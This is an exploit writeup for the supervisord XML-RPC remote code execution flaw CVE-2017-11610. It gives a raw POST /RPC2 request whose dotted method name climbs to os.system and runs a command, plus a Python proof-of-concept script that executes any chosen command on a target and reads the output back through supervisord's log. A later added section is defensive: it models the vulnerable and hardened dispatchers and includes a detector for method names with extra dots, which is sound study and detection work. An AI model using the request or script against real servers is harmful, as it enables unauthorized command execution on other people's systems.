Supervisord Remote Code Execution Vulnerability (CVE-2017-11610)

Browse to the target's supervisor web interface, exposed by the inet_http_server section of supervisord.conf; the documented example configuration listens on port 9001. In affected versions (3.0a1 through 3.3.2; fixed in 3.3.3, with backports 3.2.4, 3.1.4 and 3.0.1) the XML-RPC dispatcher behind /RPC2 resolves a dotted methodName by walking getattr() over every component, so a method name can climb from the supervisor namespace into the supervisord options object, through the warnings and linecache modules it references, and finally to os.system.

The request to send. Change the Host value to the target's IP address, and make sure Content-Length matches the byte length of the body you actually send (an intercepting proxy such as Burp recalculates it; over a raw socket a wrong value leaves the server waiting for more data). If the inet_http_server section sets a username and password, add a matching Authorization: Basic header as well.

POST /RPC2 HTTP/1.1
Host: localhost
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 275

<?xml version="1.0"?>
<methodCall>
<methodName>supervisor.supervisord.options.warnings.linecache.os.system</methodName>
<params>
<param>
<string>touch /tmp/hello</string>
</param>
</params>
</methodCall>

Send it. A 200 OK response whose XML-RPC body carries the return value of os.system (0 on success) means /tmp/hello was created on the target.

Poc.py

#!/usr/bin/env python3
# PoC for CVE-2017-11610: run a command through the traversed os.system,
# append its output to supervisord's own log file, then read it back over XML-RPC.
import xmlrpc.client
import sys

if len(sys.argv) != 3:
    sys.exit('usage: poc.py http://[user:pass@]target:9001/RPC2 "command"')

target = sys.argv[1]
command = sys.argv[2]
proxy = xmlrpc.client.ServerProxy(target)
# Snapshot the current log so that only the new output is printed afterwards
old = getattr(proxy, 'supervisor.readLog')(0, 0)
# Traverse to the options object to learn the path of supervisord's log file
logfile = getattr(proxy, 'supervisor.supervisord.options.logfile.strip')()
# Traverse to os.system and redirect the command's stdout into that log file
getattr(proxy, 'supervisor.supervisord.options.warnings.linecache.os.system')('{} | tee -a {}'.format(command, logfile))
result = getattr(proxy, 'supervisor.readLog')(0, 0)
print(result[len(old):])

Run poc.py with the /RPC2 URL as the first argument and the command to execute as the second, for example: python3 poc.py http://<target>:9001/RPC2 id. readLog(0, 0) returns the whole log, so the script prints only what was appended after its first snapshot. Two caveats: only the command's stdout passes through tee (stderr is not captured), and every run leaves the output permanently appended to the target's supervisord log.
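The following is an added example, not code from the original writeup or from supervisord itself. It models the dispatcher behaviour behind the dotted method name used above, places a hardened dispatcher beside it, and adds a check that flags request bodies whose methodName has more than the two namespace.method components the legitimate API uses. The object graph (build_root, the SimpleNamespace chain standing in for the warnings/linecache module chain, and the stand-in SupervisorNamespace class) is an assumption made for the demo; the hardened dispatcher follows the same idea as the fix shipped in supervisor 3.3.3 (exactly two components, no underscore-prefixed names, target must be a bound method) but is not supervisord's code. The sample request bodies are constructed.

```python
#!/usr/bin/env python3
"""Added example, not part of the original writeup or of supervisord.

Models the root cause of CVE-2017-11610: the XML-RPC dispatcher resolved a
dotted methodName by walking getattr() over every component, so a request
could climb from the 'supervisor' namespace through its attributes to a
module and call os.system. Shown beside a hardened dispatcher and a
request-body check. All class and attribute names below are stand-ins."""
import os
import types
import xml.etree.ElementTree as ET


class RPCError(Exception):
    """Raised for a method name the dispatcher refuses."""


def build_root():
    """Stand-in object graph (assumption). In supervisord on Python 2.7,
    supervisord.options holds the warnings module, which imports linecache,
    which imports os; here that module chain is modelled with plain
    namespaces that end in the real os module."""
    options = types.SimpleNamespace(
        logfile="/tmp/supervisord.log",
        warnings=types.SimpleNamespace(linecache=types.SimpleNamespace(os=os)),
    )
    supervisord = types.SimpleNamespace(options=options)

    class SupervisorNamespace:
        """Stand-in for the 'supervisor' RPC namespace with one real method."""
        def __init__(self):
            self.supervisord = supervisord

        def getSupervisorVersion(self):
            return "3.3.2"

    return types.SimpleNamespace(supervisor=SupervisorNamespace())


def traverse_vulnerable(root, method, params):
    """Pre-fix pattern: getattr() over each dotted part with no depth or type
    check, so any attribute reachable from a namespace becomes callable."""
    ob = root
    for part in method.split("."):
        ob = getattr(ob, part, None)
        if ob is None:
            raise RPCError(method)
    return ob(*params)


def traverse_hardened(root, method, params):
    """Only 'namespace.method', no underscore-prefixed names, and the target
    must be a bound method of the namespace object, not an arbitrary attribute."""
    parts = method.split(".")
    if len(parts) != 2 or any(p.startswith("_") for p in parts):
        raise RPCError(method)
    namespace, name = parts
    iface = getattr(root, namespace, None)
    func = getattr(iface, name, None) if iface is not None else None
    if not isinstance(func, types.MethodType):
        raise RPCError(method)
    return func(*params)


def refused(dispatcher, root, method, params=()):
    """True if the dispatcher rejects the call instead of invoking anything."""
    try:
        dispatcher(root, method, list(params))
    except RPCError:
        return True
    return False


def suspicious_method_names(xml_body):
    """Return every methodName in an XML-RPC body that does not have exactly
    the two 'namespace.method' components supervisord's real API uses;
    useful as a WAF rule or when reviewing captured /RPC2 traffic."""
    tree = ET.fromstring(xml_body)
    names = [el.text or "" for el in tree.iter("methodName")]
    return [n for n in names if len(n.split(".")) != 2]


# Constructed sample bodies: a legitimate call and the writeup's payload shape.
EXPLOIT_CHAIN = "supervisor.supervisord.options.warnings.linecache.os.system"
BENIGN_BODY = "<methodCall><methodName>supervisor.getState</methodName><params/></methodCall>"
EXPLOIT_BODY = ("<methodCall><methodName>" + EXPLOIT_CHAIN + "</methodName>"
                "<params><param><string>id</string></param></params></methodCall>")


if __name__ == "__main__":
    root = build_root()
    # The vulnerable walk reaches the os module; getpid stands in for system
    # so the demo stays harmless.
    print("vulnerable walk reached os.getpid ->",
          traverse_vulnerable(root, EXPLOIT_CHAIN.replace("system", "getpid"), []))
    print("hardened refuses exploit chain:", refused(traverse_hardened, root, EXPLOIT_CHAIN, ["id"]))
    print("hardened still serves the API:", traverse_hardened(root, "supervisor.getSupervisorVersion", []))
    print("flagged in exploit body:", suspicious_method_names(EXPLOIT_BODY))
    print("flagged in benign body:", suspicious_method_names(BENIGN_BODY))
```

The two-component rule is also the cheapest way to spot this exploit in traffic: every legitimate supervisord call is namespace.method, so any methodName with a third dot is an attempt at traversal regardless of where the chain ends.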

References:

https://www.leavesongs.com/PENETRATION/supervisord-RCE-CVE-2017-11610.html
